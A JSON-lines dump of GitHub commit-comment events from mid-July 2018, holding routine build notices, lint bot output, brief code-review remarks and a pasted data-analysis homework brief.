{"id":"7968113546","type":"CommitCommentEvent","actor":{"login":"kaveku"},"repo":{"name":"kaveku/new-Birthday-Card"},"payload":{"comment":{"id":29714642,"position":null,"line":null,"path":null,"commit_id":"b6ec055a0f576e65e9200b100661d6264302287c","created_at":"2018-07-15T23:08:40Z","updated_at":"2018-07-15T23:08:40Z","author_association":"OWNER","body":"created using android studio"}},"created_at":"2018-07-15T23:08:40Z"}
{"id":"7968113594","type":"CommitCommentEvent","actor":{"login":"ThoenigAdrian"},"repo":{"name":"ThoenigAdrian/PingPong"},"payload":{"comment":{"id":29714643,"position":null,"line":null,"path":null,"commit_id":"a04a4cb653653ed479dec543fdb8bade70496125","created_at":"2018-07-15T23:08:42Z","updated_at":"2018-07-15T23:08:42Z","author_association":"OWNER","body":"*otherwise we'll get a [...]"}},"created_at":"2018-07-15T23:08:42Z"}
{"id":"7968113979","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714644,"position":null,"line":null,"path":null,"commit_id":"baac4c075b9efeda588d805037b2cccceb28581f","created_at":"2018-07-15T23:09:06Z","updated_at":"2018-07-15T23:09:06Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 505](https://ci.hashicorp.engineering/viewLog.html?buildId=104050&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:33"}},"created_at":"2018-07-15T23:09:06Z"}
{"id":"7968114213","type":"CommitCommentEvent","actor":{"login":"wildlyinaccurate"},"repo":{"name":"highcharts/highcharts"},"payload":{"comment":{"id":29714645,"position":null,"line":null,"path":null,"commit_id":"83b5d3187504d7aaec8549ba929401c73fc82284","created_at":"2018-07-15T23:09:18Z","updated_at":"2018-07-15T23:09:18Z","author_association":"NONE","body":"Hi there! Are there any plans to backport this fix to older versions?"}},"created_at":"2018-07-15T23:09:18Z"}
{"id":"7968114320","type":"CommitCommentEvent","actor":{"login":"Husseinsltd"},"repo":{"name":"Husseinsltd/Hello"},"payload":{"comment":{"id":29714646,"position":null,"line":null,"path":null,"commit_id":"6362eccc3e87afe228959735c8e8f0524f6d95cd","created_at":"2018-07-15T23:09:25Z","updated_at":"2018-07-15T23:09:25Z","author_association":"OWNER","body":"+Hi, this file is for thoughts and ideas to assist the team to work better in Harmony, with speed and Objectivity.\r\n"}},"created_at":"2018-07-15T23:09:25Z"}
{"id":"7968114620","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"binaryage/cljs-devtools"},"payload":{"comment":{"id":29714647,"position":null,"line":null,"path":null,"commit_id":"30a3497f7fd62230348a11dcb22019b40b6e4f80","created_at":"2018-07-15T23:09:44Z","updated_at":"2018-07-15T23:09:44Z","author_association":"NONE","body":"#37"}},"created_at":"2018-07-15T23:09:44Z"}
{"id":"7968114859","type":"CommitCommentEvent","actor":{"login":"Husseinsltd"},"repo":{"name":"Husseinsltd/Hello"},"payload":{"comment":{"id":29714648,"position":null,"line":null,"path":null,"commit_id":"6362eccc3e87afe228959735c8e8f0524f6d95cd","created_at":"2018-07-15T23:09:58Z","updated_at":"2018-07-15T23:09:58Z","author_association":"OWNER","body":"cool @readme.md"}},"created_at":"2018-07-15T23:09:58Z"}
{"id":"7968115360","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"binaryage/cljs-devtools"},"payload":{"comment":{"id":29714649,"position":null,"line":null,"path":null,"commit_id":"30a3497f7fd62230348a11dcb22019b40b6e4f80","created_at":"2018-07-15T23:10:26Z","updated_at":"2018-07-15T23:10:26Z","author_association":"NONE","body":"#30a3497"}},"created_at":"2018-07-15T23:10:26Z"}
{"id":"7968115680","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"jcharlesb/S02-E01-challenge-theatre-ou-cine-master"},"payload":{"comment":{"id":29714651,"position":93,"line":93,"path":"js/app.js","commit_id":"1f568d24e5d71f86a878b569ad3c5a9ba60fb4e9","created_at":"2018-07-15T23:10:43Z","updated_at":"2018-07-15T23:10:43Z","author_association":"NONE","body":"Nickel ce if / else if / else.\r\n\r\nSache que comme ta variable `placeAvailable` contient déjà une valeur booléenne, tu peux simplifier en :\r\n\r\n``` js\r\nif (money > 30 && !placeAvailable) {\r\n  // Nous sommes complet…\r\n} else if (money > 30 && placeAvailable) {\r\n // Bon spectacle !\r\n} else {\r\n // Pas assez d'argent\r\n}\r\n```\r\n\r\nEst-ce que tu vois comment ça fonctionne ?"}},"created_at":"2018-07-15T23:10:43Z"}
{"id":"7968116021","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"binaryage/cljs-devtools"},"payload":{"comment":{"id":29714654,"position":null,"line":null,"path":null,"commit_id":"30a3497f7fd62230348a11dcb22019b40b6e4f80","created_at":"2018-07-15T23:11:00Z","updated_at":"2018-07-15T23:11:00Z","author_association":"NONE","body":"#30a3497"}},"created_at":"2018-07-15T23:11:00Z"}
{"id":"7968116341","type":"CommitCommentEvent","actor":{"login":"chikamichi"},"repo":{"name":"jcharlesb/S02-E01-challenge-theatre-ou-cine-master"},"payload":{"comment":{"id":29714655,"position":93,"line":93,"path":"js/app.js","commit_id":"1f568d24e5d71f86a878b569ad3c5a9ba60fb4e9","created_at":"2018-07-15T23:11:18Z","updated_at":"2018-07-15T23:11:18Z","author_association":"NONE","body":"On remarque une petite répétition de code avec le `money > 30`… une idée de comment on pourrait s'en débarrasser ?"}},"created_at":"2018-07-15T23:11:18Z"}
{"id":"7968116507","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"binaryage/cljs-devtools"},"payload":{"comment":{"id":29714656,"position":null,"line":null,"path":null,"commit_id":"30a3497f7fd62230348a11dcb22019b40b6e4f80","created_at":"2018-07-15T23:11:27Z","updated_at":"2018-07-15T23:11:27Z","author_association":"NONE","body":"#37"}},"created_at":"2018-07-15T23:11:27Z"}
{"id":"7968117414","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714658,"position":null,"line":null,"path":null,"commit_id":"3160d22e583dcebf0963d9ec97962646d0084211","created_at":"2018-07-15T23:12:13Z","updated_at":"2018-07-15T23:12:13Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 506](https://ci.hashicorp.engineering/viewLog.html?buildId=104051&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T23:12:13Z"}
{"id":"7968117746","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714659,"position":null,"line":null,"path":null,"commit_id":"3160d22e583dcebf0963d9ec97962646d0084211","created_at":"2018-07-15T23:12:33Z","updated_at":"2018-07-15T23:12:33Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 506](https://ci.hashicorp.engineering/viewLog.html?buildId=104051&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:20"}},"created_at":"2018-07-15T23:12:33Z"}
{"id":"7968118649","type":"CommitCommentEvent","actor":{"login":"kkapsner"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29714670,"position":null,"line":null,"path":null,"commit_id":"47a9519cebe2fe3840c498ffafa0b245cc735fca","created_at":"2018-07-15T23:13:17Z","updated_at":"2018-07-15T23:13:17Z","author_association":"OWNER","body":"Danke - ändere ich morgen. Jetzt geht's erst mal ins Bett..."}},"created_at":"2018-07-15T23:13:17Z"}
{"id":"7968118893","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"binaryage/cljs-devtools"},"payload":{"comment":{"id":29714671,"position":null,"line":null,"path":null,"commit_id":"ab0b3c1fc917f43c250b0e01c54e4b4cf39c2c46","created_at":"2018-07-15T23:13:33Z","updated_at":"2018-07-15T23:13:33Z","author_association":"NONE","body":"#ab0b3c1"}},"created_at":"2018-07-15T23:13:33Z"}
{"id":"7968118932","type":"CommitCommentEvent","actor":{"login":"MemoNano"},"repo":{"name":"MemoNano/Webinar"},"payload":{"comment":{"id":29714672,"position":null,"line":null,"path":null,"commit_id":"11a4568c271f3ab969bc8255e633c23245a672e6","created_at":"2018-07-15T23:13:34Z","updated_at":"2018-07-15T23:13:34Z","author_association":"OWNER","body":"why on origin is missing information\r\n\r\n+\"\"\"\r\n-\t+This is from MEMO branch\r\n+\"\"\""}},"created_at":"2018-07-15T23:13:34Z"}
{"id":"7968119493","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"binaryage/cljs-devtools"},"payload":{"comment":{"id":29714674,"position":null,"line":null,"path":null,"commit_id":"ab0b3c1fc917f43c250b0e01c54e4b4cf39c2c46","created_at":"2018-07-15T23:14:02Z","updated_at":"2018-07-15T23:14:02Z","author_association":"NONE","body":"#ab0b3c1"}},"created_at":"2018-07-15T23:14:02Z"}
{"id":"7968120132","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714677,"position":null,"line":null,"path":null,"commit_id":"72a2dff7cdf23f51efc7ed35efb8ce8611fc869d","created_at":"2018-07-15T23:14:35Z","updated_at":"2018-07-15T23:14:35Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 507](https://ci.hashicorp.engineering/viewLog.html?buildId=104052&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T23:14:35Z"}
{"id":"7968120611","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714678,"position":null,"line":null,"path":null,"commit_id":"72a2dff7cdf23f51efc7ed35efb8ce8611fc869d","created_at":"2018-07-15T23:14:59Z","updated_at":"2018-07-15T23:14:59Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 507](https://ci.hashicorp.engineering/viewLog.html?buildId=104052&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:20"}},"created_at":"2018-07-15T23:14:59Z"}
{"id":"7968121691","type":"CommitCommentEvent","actor":{"login":"tuanvpham"},"repo":{"name":"Visteus/Shopping-Manager"},"payload":{"comment":{"id":29714687,"position":null,"line":null,"path":null,"commit_id":"fe069ee908a70418407b3ed7cd3058efe9fde2b5","created_at":"2018-07-15T23:15:54Z","updated_at":"2018-07-15T23:15:54Z","author_association":"COLLABORATOR","body":"#4 with message framework\r\n"}},"created_at":"2018-07-15T23:15:54Z"}
{"id":"7968123450","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"conda-forge/xarray-extras-feedstock"},"payload":{"comment":{"id":29714691,"position":4,"line":4,"path":".gitignore","commit_id":"80e7765f766d4fbd088e54f20448f491cf02d876","created_at":"2018-07-15T23:17:26Z","updated_at":"2018-07-15T23:17:26Z","author_association":"MEMBER","body":"This will get dropped in the next re-render. Please submit to `conda-smithy` if it is useful.\r\n\r\nref: http://github.com/conda-forge/conda-smithy"}},"created_at":"2018-07-15T23:17:26Z"}
{"id":"7968123720","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"conda-forge/xarray-extras-feedstock"},"payload":{"comment":{"id":29714693,"position":null,"line":null,"path":null,"commit_id":"80e7765f766d4fbd088e54f20448f491cf02d876","created_at":"2018-07-15T23:17:40Z","updated_at":"2018-07-15T23:17:40Z","author_association":"MEMBER","body":"Please use a PR from your fork in the future. Thanks :)"}},"created_at":"2018-07-15T23:17:40Z"}
{"id":"7968124370","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714694,"position":null,"line":null,"path":null,"commit_id":"38fc4cba06611fce5a58371c322fcf7976671db2","created_at":"2018-07-15T23:18:18Z","updated_at":"2018-07-15T23:18:18Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 508](https://ci.hashicorp.engineering/viewLog.html?buildId=104053&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T23:18:18Z"}
{"id":"7968124412","type":"CommitCommentEvent","actor":{"login":"erangell"},"repo":{"name":"dschmenk/PLASMA"},"payload":{"comment":{"id":29714695,"position":null,"line":null,"path":null,"commit_id":"8f408c8bbb1582dbebd7d2cdb0f7389da059971a","created_at":"2018-07-15T23:18:21Z","updated_at":"2018-07-15T23:18:21Z","author_association":"NONE","body":"I was testing in Virtual II, so the virtual SoftCard caused the hang.  I didn't test it on real hardware.  Thanks for the info."}},"created_at":"2018-07-15T23:18:21Z"}
{"id":"7968124763","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714696,"position":null,"line":null,"path":null,"commit_id":"38fc4cba06611fce5a58371c322fcf7976671db2","created_at":"2018-07-15T23:18:41Z","updated_at":"2018-07-15T23:18:41Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 508](https://ci.hashicorp.engineering/viewLog.html?buildId=104053&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:23"}},"created_at":"2018-07-15T23:18:41Z"}
{"id":"7968126161","type":"CommitCommentEvent","actor":{"login":"michaelblyons"},"repo":{"name":"LineageOS/android_packages_apps_Updater"},"payload":{"comment":{"id":29714697,"position":null,"line":null,"path":null,"commit_id":"27968c449082278ec529ae50c1eed7ba35945b49","created_at":"2018-07-15T23:19:57Z","updated_at":"2018-07-15T23:19:57Z","author_association":"NONE","body":"Will this mean that you are repeatedly nagged to update, even if the update is not desired? I receive notifications about builds that contain no code changes, and I don't particularly want to update when the only difference is a new build date.\r\n\r\nI apologize if this is only for downloaded updates' \"Reboot?\" notification or for something else."}},"created_at":"2018-07-15T23:19:57Z"}
{"id":"7968126370","type":"CommitCommentEvent","actor":{"login":"supersmartkid"},"repo":{"name":"rodan/ds3231"},"payload":{"comment":{"id":29714698,"position":14,"line":10,"path":"ds3231.h","commit_id":"5648c7de8322f3b42fde7849589cd197619a4f23","created_at":"2018-07-15T23:20:08Z","updated_at":"2018-07-15T23:20:08Z","author_association":"NONE","body":"Jhono"}},"created_at":"2018-07-15T23:20:08Z"}
{"id":"7968127383","type":"CommitCommentEvent","actor":{"login":"TDHolmes"},"repo":{"name":"TDHolmes/Harma"},"payload":{"comment":{"id":29714700,"position":33,"line":8,"path":"Pensel/firmware/peripherals/USB/hw_config.c","commit_id":"c1a2f0950b8859ec5750bcd3f6a06e3090d881c0","created_at":"2018-07-15T23:20:52Z","updated_at":"2018-07-15T23:20:52Z","author_association":"OWNER","body":"I hate seeing that gross block comment always. Need (should) keep it, so toss it below all the code!"}},"created_at":"2018-07-15T23:20:52Z"}
{"id":"7968127737","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"gruntjs/grunt-contrib-connect"},"payload":{"comment":{"id":29714703,"position":null,"line":null,"path":null,"commit_id":"03fa06ecc22a285c1ef458ca2222e85a880051d4","created_at":"2018-07-15T23:21:11Z","updated_at":"2018-07-15T23:21:11Z","author_association":"NONE","body":"#03fa06e"}},"created_at":"2018-07-15T23:21:11Z"}
{"id":"7968136125","type":"CommitCommentEvent","actor":{"login":"arjenlentz"},"repo":{"name":"HeuristNetwork/heurist"},"payload":{"comment":{"id":29714726,"position":15,"line":785,"path":"admin/setup/dbcreate/blankDBStructure.sql","commit_id":"72e9cd461f6405f33125564be63e873fd7535d66","created_at":"2018-07-15T23:28:52Z","updated_at":"2018-07-15T23:28:52Z","author_association":"NONE","body":"Missing semicolon on line 785"}},"created_at":"2018-07-15T23:28:52Z"}
{"id":"7968136371","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714727,"position":null,"line":null,"path":null,"commit_id":"a6aedf220a6af977ae76f688679771b60fbca9eb","created_at":"2018-07-15T23:29:06Z","updated_at":"2018-07-15T23:29:06Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 511](https://ci.hashicorp.engineering/viewLog.html?buildId=104056&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T23:29:06Z"}
{"id":"7968136698","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714728,"position":null,"line":null,"path":null,"commit_id":"a6aedf220a6af977ae76f688679771b60fbca9eb","created_at":"2018-07-15T23:29:26Z","updated_at":"2018-07-15T23:29:26Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 511](https://ci.hashicorp.engineering/viewLog.html?buildId=104056&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:20"}},"created_at":"2018-07-15T23:29:26Z"}
{"id":"7968137269","type":"CommitCommentEvent","actor":{"login":"jscho13"},"repo":{"name":"bostonRitualClub/tightfit"},"payload":{"comment":{"id":29714730,"position":20,"line":113,"path":"app/controllers/cam_models_controller.rb","commit_id":"d1b11fa236e3c3d3f710f3b489a2435b1af34bb9","created_at":"2018-07-15T23:29:57Z","updated_at":"2018-07-15T23:29:57Z","author_association":"MEMBER","body":"I fixed this by dropping the entire database and making a new one. If I pulled that off at my company they woulda fired me LOL.\r\n\r\nanyhow this is the best method name ever"}},"created_at":"2018-07-15T23:29:57Z"}
{"id":"7968138250","type":"CommitCommentEvent","actor":{"login":"ribet888"},"repo":{"name":"ribet888/metasploit-framework"},"payload":{"comment":{"id":29714734,"position":null,"line":null,"path":null,"commit_id":"b9192d1bdb51ddd19009d2cf3df787193ede7160","created_at":"2018-07-15T23:30:39Z","updated_at":"2018-07-15T23:30:39Z","author_association":"OWNER","body":"`git pull`"}},"created_at":"2018-07-15T23:30:39Z"}
{"id":"7968138881","type":"CommitCommentEvent","actor":{"login":"ShadowThree"},"repo":{"name":"ShadowThree/HelloWorld"},"payload":{"comment":{"id":29714736,"position":null,"line":null,"path":null,"commit_id":"027ed234ae23c40b04fe038a5471ae25e095d0d2","created_at":"2018-07-15T23:31:14Z","updated_at":"2018-07-15T23:31:14Z","author_association":"OWNER","body":"Leave a comment is mean to talk about the file \"Hello World.c\", yes?"}},"created_at":"2018-07-15T23:31:14Z"}
{"id":"7968141196","type":"CommitCommentEvent","actor":{"login":"dreua"},"repo":{"name":"cnlohr/cnping"},"payload":{"comment":{"id":29714740,"position":null,"line":null,"path":null,"commit_id":"67bf9b73eefe1de63bed8608e7cb79250bea5f3d","created_at":"2018-07-15T23:33:19Z","updated_at":"2018-07-15T23:33:19Z","author_association":"CONTRIBUTOR","body":"I swear I compiled exactly the source code I committed but nevertheless one should never trust binaries from some unknown guy on the net. (Could also be some malware on my computer which I am not aware of.)\r\nGood new is: I think it was just an newer compiler-version with the feature (or bug?) to write more duplicates of its version to the exe, see bytes 00006630 to 00006a50 of the diff [exediff.txt](https://github.com/cnlohr/cnping/files/2196231/exediff.txt).\r\n\r\nI used `diff -y <(xxd cnping_dreua.exe) <(xxd cnping_cnlohr.exe) -W180 > exediff.txt` to create this, use `colordiff`for a more colorful output.\r\n\r\n"}},"created_at":"2018-07-15T23:33:19Z"}
{"id":"7968141753","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714743,"position":null,"line":null,"path":null,"commit_id":"8b6ceb8bbf52dc294760dcdc6c0a1bcc4db2973b","created_at":"2018-07-15T23:33:51Z","updated_at":"2018-07-15T23:33:51Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 512](https://ci.hashicorp.engineering/viewLog.html?buildId=104057&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-15T23:33:51Z"}
{"id":"7968142165","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29714744,"position":null,"line":null,"path":null,"commit_id":"8b6ceb8bbf52dc294760dcdc6c0a1bcc4db2973b","created_at":"2018-07-15T23:34:16Z","updated_at":"2018-07-15T23:34:16Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 512](https://ci.hashicorp.engineering/viewLog.html?buildId=104057&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:22"}},"created_at":"2018-07-15T23:34:16Z"}
{"id":"7968142375","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"gruntjs/grunt-contrib-qunit"},"payload":{"comment":{"id":29714745,"position":null,"line":null,"path":null,"commit_id":"733348d49531dffed0e4ed77e1529a2ab9310ca9","created_at":"2018-07-15T23:34:28Z","updated_at":"2018-07-15T23:34:28Z","author_association":"NONE","body":"#733348d"}},"created_at":"2018-07-15T23:34:28Z"}
{"id":"7968144738","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29714755,"position":null,"line":null,"path":null,"commit_id":"395be846dee776d565b9e774bc0f0d6a9a356ceb","created_at":"2018-07-15T23:36:35Z","updated_at":"2018-07-15T23:36:35Z","author_association":"NONE","body":"#253"}},"created_at":"2018-07-15T23:36:35Z"}
{"id":"7968144954","type":"CommitCommentEvent","actor":{"login":"Jessicachong"},"repo":{"name":"gruntjs/grunt-contrib-uglify"},"payload":{"comment":{"id":29714757,"position":null,"line":null,"path":null,"commit_id":"395be846dee776d565b9e774bc0f0d6a9a356ceb","created_at":"2018-07-15T23:36:48Z","updated_at":"2018-07-15T23:36:48Z","author_association":"NONE","body":"#253"}},"created_at":"2018-07-15T23:36:48Z"}
{"id":"7968145230","type":"CommitCommentEvent","actor":{"login":"KCSunrise"},"repo":{"name":"KCSunrise/RaoPymaceutical"},"payload":{"comment":{"id":29714758,"position":null,"line":null,"path":null,"commit_id":"e9b8d9a24066440e3aaea96efdc64f80ac397c21","created_at":"2018-07-15T23:37:03Z","updated_at":"2018-07-15T23:37:03Z","author_association":"OWNER","body":"Option 2: Pymaceuticals Inc\r\nLaboratory\r\n\r\nWhile your data companions rushed off to jobs in finance and government, you remained adamant that science was the way for you. Staying true to your mission, you've since joined Pymaceuticals Inc., a burgeoning pharmaceutical company based out of San Diego, CA. Pymaceuticals specializes in drug-based, anti-cancer pharmaceuticals. In their most recent efforts, they've since begun screening for potential treatments to squamous cell carcinoma (SCC), a commonly occurring form of skin cancer.\r\n\r\nAs their Chief Data Analyst, you've been given access to the complete data from their most recent animal study. In this study, 250 mice were treated through a variety of drug regimes over the course of 45 days. Their physiological responses were then monitored over the course of that time. Your objective is to analyze the data to show how four treatments (Capomulin, Infubinol, Ketapril, and Placebo) compare.\r\n\r\nTo do this you are tasked with:\r\n\r\nCreating a scatter plot that shows how the tumor volume changes over time for each treatment.\r\nCreating a scatter plot that shows how the number of metastatic (cancer spreading) sites changes over time for each treatment.\r\nCreating a scatter plot that shows the number of mice still alive through the course of treatment (Survival Rate)\r\nCreating a bar graph that compares the total % tumor volume change for each drug across the full 45 days.\r\nAs final considerations:\r\n\r\nYou must use the Pandas Library and the Jupyter Notebook.\r\nYou must use the Matplotlib and Seaborn libraries.\r\nYou must include a written description of three observable trends based on the data.\r\nYou must use proper labeling of your plots, including aspects like: Plot Titles, Axes Labels, Legend Labels, X and Y Axis Limits, etc.\r\nYour scatter plots must include error bars. This will allow the company to account for variability between mice. You may want to look into pandas.DataFrame.sem for ideas on how to calculate this.\r\nRemember when making your plots to consider aesthetics!\r\nYour legends should not be overlaid on top of any data.\r\nYour bar graph should indicate tumor growth as red and tumor reduction as green. It should also include a label with the percentage change for each bar. You may want to consult this tutorial for relevant code snippets.\r\nYou must include an exported markdown version of your Notebook called README.md in your GitHub repository.\r\nSee Example Solution for a reference on expected format. (Note: For this example, you are not required to match the tables or data frames included. Your only goal is to build the scatter plots and bar graphs. Consider the tables to be potential clues, but feel free to approach this problem, however, you like.)\r\nHints and Considerations\r\nBe warned: These are very challenging tasks. Be patient with yourself as you trudge through these problems. They will take time and there is no shame in fumbling along the way. Data visualization is equal parts exploration, equal parts resolution.\r\n\r\nBetween these two exercises, the Pymaceuticals one is significantly more challenging. So choose that one only if you feel somewhat comfortable with the material covered so far. The Pymaceuticals example will require you to research a good bit on your own for hacked solutions to problems you'll experience along the way. If you end up choosing this exercise, feel encouraged to constantly refer back to Stack Overflow and the Pandas Documentation. These are needed tools in every data analyst's arsenl.\r\n\r\nDon't get bogged down in small details. Always focus on the big picture. If you can't figure out how to get a label to show up correctly, come back to it. Focus on getting the core skeleton of your notebook complete. You can always re-visit old problems.\r\n\r\nRemember: There are many ways to skin a cat, and similarly there are many ways to approach a data problem. The key throughout, however, is to break up your task into micro tasks. Try answering questions like: \"How does my Data Frame need to be structured for me to have the right X and Y axis?\" \"How do I build a basic scatter plot?\" \"How do I add a label to that scatter plot?\" \"Where would the labels for that scatter plot come from?\". Again! Don't let the magnitude of a programming task scare you off. Ultimately, every programming problem boils down to a handful of smaller, bite-sized tasks.\r\n\r\nGet help when you need it! There is never any shame in asking. But as always, ask a specific question. You'll never get a great answer to: \"I'm lost.\" Good luck!\r\n\r\nCopyright\r\nCoding Boot Camp (C) 2016. All Rights Reserved."}},"created_at":"2018-07-15T23:37:03Z"}
{"id":"7968145439","type":"CommitCommentEvent","actor":{"login":"KCSunrise"},"repo":{"name":"KCSunrise/RaoPymaceutical"},"payload":{"comment":{"id":29714760,"position":null,"line":null,"path":null,"commit_id":"e9b8d9a24066440e3aaea96efdc64f80ac397c21","created_at":"2018-07-15T23:37:13Z","updated_at":"2018-07-15T23:37:13Z","author_association":"OWNER","body":"Instructions for HW"}},"created_at":"2018-07-15T23:37:13Z"}
{"id":"7968145955","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714761,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"b013062ca4753e04f16d622678be98978eefe66b","created_at":"2018-07-15T23:37:42Z","updated_at":"2018-07-15T23:37:42Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command/lastfm (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/lastfm\" in any of:"}},"created_at":"2018-07-15T23:37:42Z"}
{"id":"7968145957","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714762,"position":8,"line":null,"path":"pkg/command/lastfm/lastfm.go","commit_id":"b013062ca4753e04f16d622678be98978eefe66b","created_at":"2018-07-15T23:37:42Z","updated_at":"2018-07-15T23:37:42Z","author_association":"NONE","body":"unconvert: could not import github.com/disiqueira/ultraslackbot/pkg/command (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command\" in any of:"}},"created_at":"2018-07-15T23:37:42Z"}
{"id":"7968145963","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714763,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"b013062ca4753e04f16d622678be98978eefe66b","created_at":"2018-07-15T23:37:42Z","updated_at":"2018-07-15T23:37:42Z","author_association":"NONE","body":"go vet: cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/lastfm\" in any of:"}},"created_at":"2018-07-15T23:37:42Z"}
{"id":"7968145965","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714764,"position":41,"line":null,"path":"pkg/command/lastfm/lastfm.go","commit_id":"b013062ca4753e04f16d622678be98978eefe66b","created_at":"2018-07-15T23:37:43Z","updated_at":"2018-07-15T23:37:43Z","author_association":"NONE","body":"golint: exported function NewLastFMCommand should have comment or be unexported"}},"created_at":"2018-07-15T23:37:43Z"}
{"id":"7968145969","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714765,"position":4,"line":null,"path":"internal/app/app.go","commit_id":"b013062ca4753e04f16d622678be98978eefe66b","created_at":"2018-07-15T23:37:43Z","updated_at":"2018-07-15T23:37:43Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command/lastfm (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command/lastfm\" in any of:"}},"created_at":"2018-07-15T23:37:43Z"}
{"id":"7968145971","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29714766,"position":8,"line":null,"path":"pkg/command/lastfm/lastfm.go","commit_id":"b013062ca4753e04f16d622678be98978eefe66b","created_at":"2018-07-15T23:37:43Z","updated_at":"2018-07-15T23:37:43Z","author_association":"NONE","body":"unparam: could not import github.com/disiqueira/ultraslackbot/pkg/command (cannot find package \"github.com/disiqueira/ultraslackbot/pkg/command\" in any of:"}},"created_at":"2018-07-15T23:37:43Z"}
